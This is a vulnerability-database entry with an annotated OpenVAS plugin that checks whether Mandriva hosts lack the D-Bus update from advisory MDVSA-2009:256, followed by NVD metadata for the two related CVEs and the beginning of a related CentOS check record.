ID OPENVAS:136141256231065733 Type openvas Reporter Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com Modified 2018-04-06T00:00:00
Description
The remote host is missing an update to dbus
announced via advisory MDVSA-2009:256.
# OpenVAS Vulnerability Test
# $Id: mdksa_2009_256.nasl 9350 2018-04-06 07:03:33Z cfischer $
# Description: Auto-generated from advisory MDVSA-2009:256 (dbus)
#
# Authors:
# Thomas Reinke <reinke@securityspace.com>
#
# Copyright:
# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largely excerpted from the referenced
# advisory, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# or at your option, GNU General Public License version 3,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Shared include pulled in before the description block; what it provides is
# not visible in this file.
include("revisions-lib.inc");
# Advisory text, registered as the "insight" tag in the description block.
# NOTE(review): the wording says "remote attackers", while the
# cvss_base_vector registered in the description block is AV:L (local access).
# Prioritise on the vector, and treat the prose as quoted advisory text.
tag_insight = "A vulnerability was discovered and corrected in dbus:
The _dbus_validate_signature_with_reason function
(dbus-marshal-validate.c) in D-Bus (aka DBus) uses incorrect logic
to validate a basic type, which allows remote attackers to spoof a
signature via a crafted key. NOTE: this is due to an incorrect fix
for CVE-2008-3834 (CVE-2009-1189).
This update provides a fix for this vulnerability.
Affected: 2008.1, 2009.0, Enterprise Server 5.0";
# Remediation text, registered as the "solution" tag.
# NOTE(review): of the two integrity checks the text names, the GPG signature
# is the one that authenticates the package; an MD5 checksum alone should not
# be relied on for that.
tag_solution = "To upgrade automatically use MandrakeUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
https://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:256";
# One-line finding text, registered as the "summary" tag.
tag_summary = "The remote host is missing an update to dbus
announced via advisory MDVSA-2009:256.";
# Metadata registration: when the scanner sets `description`, only the
# script_* calls below run and the script exits before any host check.
if (description)
{
  # Identity of the check.
  script_oid("1.3.6.1.4.1.25623.1.0.65733");
  script_name("Mandrake Security Advisory MDVSA-2009:256 (dbus)");
  script_family("Mandrake Local Security Checks");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com");

  # Revision bookkeeping.
  script_version("$Revision: 9350 $");
  script_tag(name:"creation_date", value:"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)");
  script_tag(name:"last_modification", value:"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $");

  # Vulnerability references and CVSS v2 scoring. The vector is local-access
  # (AV:L) with partial integrity and availability impact.
  script_cve_id("CVE-2008-3834", "CVE-2009-1189");
  script_tag(name:"cvss_base", value:"3.6");
  script_tag(name:"cvss_base_vector", value:"AV:L/AC:L/Au:N/C:N/I:P/A:P");

  # The result is derived from the RPM list gathered over an authenticated
  # login: both knowledge-base keys must be present for the check to run.
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/mandriva_mandrake_linux", "ssh/login/rpms");

  # Human-readable texts defined above this block.
  script_tag(name:"summary", value:tag_summary);
  script_tag(name:"insight", value:tag_insight);
  script_tag(name:"solution", value:tag_solution);

  # Confidence basis (package version) and remediation type (vendor update).
  script_tag(name:"qod_type", value:"package");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}
#
# The script code starts here
#
include("pkg-lib-rpm.inc");

# Binary packages covered by the advisory, in the order they are checked.
dbus_pkgs = make_list("dbus", "dbus-x11", "libdbus-1_3", "libdbus-1-devel",
                      "lib64dbus-1_3", "lib64dbus-1-devel");

# Fixed version-release suffix per affected product, paired by index with the
# release key handed to isrpmvuln().
fixed_suffix = make_list("~1.1.20~5.2mdv2008.1",
                         "~1.2.3~2.2mdv2009.0",
                         "~1.2.3~2.2mdvmes5");
release_key = make_list("MNDK_2008.1", "MNDK_2009.0", "MNDK_mes5");

res = "";
report = "";

# Releases in the outer loop and packages in the inner loop, so every
# isrpmvuln() call is issued in the original sequence and with the same
# arguments.
# isrpmvuln() comes from pkg-lib-rpm.inc; presumably it compares the installed
# RPM with the fixed version for that release (confirm against the library).
# Any non-NULL result is appended to the report.
for (i = 0; i < max_index(release_key); i++) {
  foreach dbus_pkg (dbus_pkgs) {
    res = isrpmvuln(pkg:dbus_pkg, rpm:dbus_pkg + fixed_suffix[i], rls:release_key[i]);
    if (res != NULL) {
      report += res;
    }
  }
}

# NOTE(review): this is a package-version check only. It cannot tell whether
# dbus-daemon and processes linked against libdbus were restarted after the
# update, so a clean result should be confirmed on the host.
if (report == "") {
  # __pkg_match is set outside this file (presumably by pkg-lib-rpm.inc when a
  # listed package was found installed); exit code 99 reports "not vulnerable".
  if (__pkg_match) {
    exit(99); # Not vulnerable.
  }
} else {
  security_message(data:report);
}
{"id": "OPENVAS:136141256231065733", "type": "openvas", "bulletinFamily": "scanner", "title": "Mandrake Security Advisory MDVSA-2009:256 (dbus)", "description": "The remote host is missing an update to dbus\nannounced via advisory MDVSA-2009:256.", "published": "2009-10-13T00:00:00", "modified": "2018-04-06T00:00:00", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065733", "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "references": [], "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "lastseen": "2018-04-06T11:39:06", "viewCount": 1, "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2018-04-06T11:39:06", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-3834", "CVE-2009-1189"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2010-0018.NASL", "SUSE_DBUS-1-7482.NASL", "REDHAT-RHSA-2010-0018.NASL", "DEBIAN_DSA-1837.NASL", "SUSE_DBUS-1-7483.NASL", "ORACLELINUX_ELSA-2010-0018.NASL", "SL_20090107_DBUS_ON_SL5_X.NASL", "MANDRIVA_MDVSA-2009-256.NASL", "GENTOO_GLSA-200901-04.NASL", "SUSE_11_DBUS-1-110418.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310880595", "OPENVAS:65733", "OPENVAS:1361412562310870201", "OPENVAS:870201", "OPENVAS:136141256231066422", "OPENVAS:880595", "OPENVAS:830423", "OPENVAS:65851", "OPENVAS:66422", "OPENVAS:63155"]}, {"type": "oraclelinux", "idList": ["ELSA-2009-0008", "ELSA-2010-0018"]}, {"type": "exploitdb", "idList": ["EDB-ID:7822"]}, {"type": "gentoo", "idList": ["GLSA-200901-04"]}, {"type": "centos", "idList": ["CESA-2009:0008", "CESA-2010:0018"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22190", "SECURITYVULNS:VULN:10085"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1837-1:C3DAA", "DEBIAN:DSA-1658-1:215BD"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:74119"]}, {"type": "redhat", "idList": ["RHSA-2009:0008", "RHSA-2010:0476", 
"RHSA-2010:0095", "RHSA-2010:0018"]}, {"type": "seebug", "idList": ["SSV:4172", "SSV:4192", "SSV:66216", "SSV:17745"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:03EDEADC4429D708F596466B2E2F298F"]}, {"type": "ubuntu", "idList": ["USN-653-1", "USN-799-1"]}, {"type": "vmware", "idList": ["VMSA-2010-0004"]}], "modified": "2018-04-06T11:39:06", "rev": 2}, "vulnersScore": 6.9}, "pluginID": "136141256231065733", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_256.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:256 (dbus)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability was discovered and corrected in dbus:\n\nThe _dbus_validate_signature_with_reason function\n(dbus-marshal-validate.c) in D-Bus (aka DBus) uses incorrect logic\nto validate a basic type, which allows remote attackers to spoof a\nsignature via a crafted key. 
NOTE: this is due to an incorrect fix\nfor CVE-2008-3834 (CVE-2009-1189).\n\nThis update provides a fix for this vulnerability.\n\nAffected: 2008.1, 2009.0, Enterprise Server 5.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:256\";\ntag_summary = \"The remote host is missing an update to dbus\nannounced via advisory MDVSA-2009:256.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65733\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2008-3834\", \"CVE-2009-1189\");\n script_tag(name:\"cvss_base\", value:\"3.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:256 (dbus)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.1.20~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.1.20~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1_3\", rpm:\"libdbus-1_3~1.1.20~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1-devel\", rpm:\"libdbus-1-devel~1.1.20~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1_3\", rpm:\"lib64dbus-1_3~1.1.20~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1-devel\", rpm:\"lib64dbus-1-devel~1.1.20~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.2.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.2.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1_3\", rpm:\"libdbus-1_3~1.2.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1-devel\", rpm:\"libdbus-1-devel~1.2.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"lib64dbus-1_3\", rpm:\"lib64dbus-1_3~1.2.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1-devel\", rpm:\"lib64dbus-1-devel~1.2.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.2.3~2.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.2.3~2.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1_3\", rpm:\"libdbus-1_3~1.2.3~2.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1-devel\", rpm:\"libdbus-1-devel~1.2.3~2.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1_3\", rpm:\"lib64dbus-1_3~1.2.3~2.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1-devel\", rpm:\"lib64dbus-1-devel~1.2.3~2.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "naslFamily": "Mandrake Local Security Checks"}
{"cve": [{"lastseen": "2020-12-09T19:28:24", "description": "The dbus_signature_validate function in the D-bus library (libdbus) before 1.2.4 allows remote attackers to cause a denial of service (application abort) via a message containing a malformed signature, which triggers a failed assertion error.", "edition": 5, "cvss3": {}, "published": "2008-10-07T21:01:00", "title": "CVE-2008-3834", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3834"], "modified": "2017-09-29T01:31:00", "cpe": ["cpe:/a:freedesktop:dbus:0.1", "cpe:/a:freedesktop:dbus:0.91", "cpe:/a:freedesktop:dbus:0.8", "cpe:/a:freedesktop:dbus:0.21", "cpe:/a:freedesktop:dbus:0.36", "cpe:/a:freedesktop:dbus:0.31", "cpe:/a:freedesktop:dbus:0.35.2", "cpe:/a:freedesktop:dbus:0.12", "cpe:/a:freedesktop:dbus:0.35", "cpe:/a:freedesktop:dbus:0.34", "cpe:/a:freedesktop:dbus:0.50", "cpe:/a:freedesktop:dbus:0.22", "cpe:/a:freedesktop:dbus:0.5", "cpe:/a:freedesktop:dbus:0.62", "cpe:/a:freedesktop:dbus:0.23.1", "cpe:/a:freedesktop:dbus:0.9", "cpe:/a:freedesktop:dbus:1.0.2", "cpe:/a:freedesktop:dbus:0.11", "cpe:/a:freedesktop:dbus:0.7", "cpe:/a:freedesktop:dbus:0.90", "cpe:/a:freedesktop:dbus:0.3", "cpe:/a:freedesktop:dbus:0.92", "cpe:/a:freedesktop:dbus:1.1.1", "cpe:/a:freedesktop:dbus:0.2", "cpe:/a:freedesktop:dbus:0.23.2", "cpe:/a:freedesktop:dbus1.0:rc1", "cpe:/a:freedesktop:dbus:0.61", "cpe:/a:freedesktop:dbus:0.36.2", "cpe:/a:freedesktop:dbus1.0:rc2", "cpe:/a:freedesktop:dbus:1.1.4", "cpe:/a:freedesktop:dbus:0.13", 
"cpe:/a:freedesktop:dbus:0.23", "cpe:/a:freedesktop:dbus:0.6", "cpe:/a:freedesktop:dbus:0.35.1", "cpe:/a:freedesktop:dbus1.0:rc3", "cpe:/a:freedesktop:dbus:0.36.1", "cpe:/a:freedesktop:dbus:1.1.2", "cpe:/a:freedesktop:dbus:0.32", "cpe:/a:freedesktop:dbus:0.10", "cpe:/a:freedesktop:dbus:0.33", "cpe:/a:freedesktop:dbus1.1.0:*", "cpe:/a:freedesktop:dbus:0.4", "cpe:/a:freedesktop:dbus:0.23.3", "cpe:/a:freedesktop:dbus:0.20"], "id": "CVE-2008-3834", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3834", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:freedesktop:dbus:0.22:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.13:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus1.1.0:*:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus1.0:rc3:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.23.1:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.61:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.4:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.36:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.6:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.31:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.21:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.1:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.35.1:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.36.2:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.3:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus1.0:rc1:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.35.2:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.35:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.23.3:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.50:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.90:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.12:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.92:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.23.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:freedesktop:dbus1.0:rc2:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.32:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.62:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.10:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.36.1:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.11:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.9:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.7:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.5:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.34:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.2:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.33:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.20:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.23:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.1.4:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:31:18", "description": "The _dbus_validate_signature_with_reason function (dbus-marshal-validate.c) in D-Bus (aka DBus) before 1.2.14 uses incorrect logic to validate a basic type, which allows remote attackers to spoof a signature via a crafted key. 
NOTE: this is due to an incorrect fix for CVE-2008-3834.", "edition": 5, "cvss3": {}, "published": "2009-04-27T18:00:00", "title": "CVE-2009-1189", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1189"], "modified": "2018-10-03T21:59:00", "cpe": ["cpe:/a:freedesktop:dbus:0.1", "cpe:/a:freedesktop:dbus:0.91", "cpe:/a:freedesktop:dbus:0.8", "cpe:/a:freedesktop:dbus:0.21", "cpe:/a:freedesktop:dbus:0.36", "cpe:/a:freedesktop:dbus:0.31", "cpe:/a:freedesktop:dbus:0.35.2", "cpe:/a:freedesktop:dbus:0.12", "cpe:/a:freedesktop:dbus:0.35", "cpe:/a:freedesktop:dbus:0.34", "cpe:/a:freedesktop:dbus:1.2.1", "cpe:/a:freedesktop:dbus:1.0", "cpe:/a:freedesktop:dbus:0.50", "cpe:/a:freedesktop:dbus:0.22", "cpe:/a:freedesktop:dbus:0.5", "cpe:/a:freedesktop:dbus:0.62", "cpe:/a:freedesktop:dbus:0.23.1", "cpe:/a:freedesktop:dbus:0.9", "cpe:/a:freedesktop:dbus:1.0.2", "cpe:/a:freedesktop:dbus:0.11", "cpe:/a:freedesktop:dbus:0.7", "cpe:/a:freedesktop:dbus:0.90", "cpe:/a:freedesktop:dbus:0.3", "cpe:/a:freedesktop:dbus:0.92", "cpe:/a:freedesktop:dbus:1.1.1", "cpe:/a:freedesktop:dbus:0.2", "cpe:/a:freedesktop:dbus:0.23.2", "cpe:/a:freedesktop:dbus:0.61", "cpe:/a:freedesktop:dbus:0.36.2", "cpe:/a:freedesktop:dbus:1.1.4", "cpe:/a:freedesktop:dbus:0.13", "cpe:/a:freedesktop:dbus:0.23", "cpe:/a:freedesktop:dbus:0.6", "cpe:/a:freedesktop:dbus:0.35.1", "cpe:/a:freedesktop:dbus:1.2.3", "cpe:/a:freedesktop:dbus:0.36.1", "cpe:/a:freedesktop:dbus:1.1.2", "cpe:/a:freedesktop:dbus:1.1.20", 
"cpe:/a:freedesktop:dbus:0.32", "cpe:/a:freedesktop:dbus:0.10", "cpe:/a:freedesktop:dbus:0.33", "cpe:/a:freedesktop:dbus:1.1.0", "cpe:/a:freedesktop:dbus:0.4", "cpe:/a:freedesktop:dbus:0.23.3", "cpe:/a:freedesktop:dbus:0.60", "cpe:/a:freedesktop:dbus:0.20"], "id": "CVE-2009-1189", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1189", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:freedesktop:dbus:0.22:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.13:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.23.1:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.61:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.4:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.36:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.6:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.31:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.21:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.1:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.35.1:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.36.2:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.3:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.35.2:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.35:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.23.3:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.50:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.90:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.12:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.92:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.23.2:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.1.20:*:*:*:*:*:*:*", 
"cpe:2.3:a:freedesktop:dbus:0.32:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.60:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.62:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.10:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.36.1:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.11:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.9:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.7:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.5:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.34:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.2:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.33:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.20:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.23:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.1.4:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-25T10:55:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "description": "Check for the Version of dbus", "modified": "2017-07-10T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:880595", "href": "http://plugins.openvas.org/nasl.php?oid=880595", "type": "openvas", "title": "CentOS Update for dbus CESA-2010:0018 centos5 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for dbus CESA-2010:0018 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A 
